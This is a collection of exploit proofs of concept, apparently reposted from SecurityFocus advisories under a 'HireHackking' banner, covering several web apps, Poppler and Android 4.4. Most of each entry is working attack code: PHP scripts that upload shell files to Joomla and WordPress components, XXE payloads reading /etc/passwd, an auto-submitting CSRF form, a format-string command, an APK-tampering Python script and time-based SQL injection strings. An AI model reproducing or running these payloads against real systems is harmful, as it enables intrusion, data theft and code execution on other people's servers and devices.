============================================================================
'''
HireHackking 
source: https://www.securityfocus.com/bid/63287/info

The Maian15 component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch =
curl_init("http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
source: https://www.securityfocus.com/bid/63260/info

Apache Shindig is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

Apache Shindig 2.5.0 is vulnerable. 

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module> 
<ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" /> 
</ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module>
HireHackking 
source: https://www.securityfocus.com/bid/63363/info

JReport is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 

<html>
<body>
<form name="foo" action="https://www.example.com/jreport/jinfonet/dealSchedules.jsp"method="post">
<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">
<input type=hidden name="cmd" value="cmd_delete_schedules">
<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">
<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">
<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">
</form>
<script>
document.foo.submit();
</script>
</body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/63374/info

Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.

Versions prior to Poppler 0.24.3 are vulnerable. 

./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n"
HireHackking 
source: https://www.securityfocus.com/bid/63431/info

Openbravo ERP is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

Openbravo ERP 2.5 and 3.0 are vulnerable. 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
        <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
                <id>C970393BDF6C43E2B030D23482D88EED</id>
                <comments>&xxe;</comments>
        </Product>
</ob:Openbravo>
HireHackking 
source: https://www.securityfocus.com/bid/63523/info

The This Way Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. 

<?php
$uploadfile="upl.php";
$ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
HireHackking 
source: https://www.securityfocus.com/bid/63547/info

Google Android is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.

Android 4.4 is vulnerable; other versions may also be affected. 

#!/usr/bin/python

import zipfile
import struct
import sys

# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], 'r').read()

fp = zout.fp

for name in zin.namelist():
    old = zin.read(name)
    if name != replace:
        zout.writestr(name, old, zipfile.ZIP_DEFLATED)
    else:
        assert len(new) <= len(old)

        # write header, old data, and record offset
        zout.writestr(name, old, zipfile.ZIP_STORED)
        offset = fp.tell()

        # return to name length, set to skip old data
        fp.seek(-len(old) -len(name) -4, 1)
        fp.write(struct.pack('<h', len(name) + len(old)))

        # after old data, write new data \0 padded
        fp.seek(offset)
        fp.write(new)
        fp.write('\0' * (len(old) - len(new)))

zout.close()
zin.close()
HireHackking 
source: https://www.securityfocus.com/bid/63435/info

Course Registration Management System is prone to multiple cross-site scripting and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.

Course Registration Management System 2.2.1 is vulnerable; other versions may also be affected. 


http://example.com/add_user.php (POST -  params: work_tel, lastname, email, gmc_reg, job_title, firstname)

http://example.com/login.php (POST -  params: username)

http://example.com/auth.php (POST -  params: username)

http://example.com/forgotten_password.php
(POST - username)
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

http://example.com/add_user.php
(POST - email)
email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

http://example.com/login.php
(POST - username)
username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+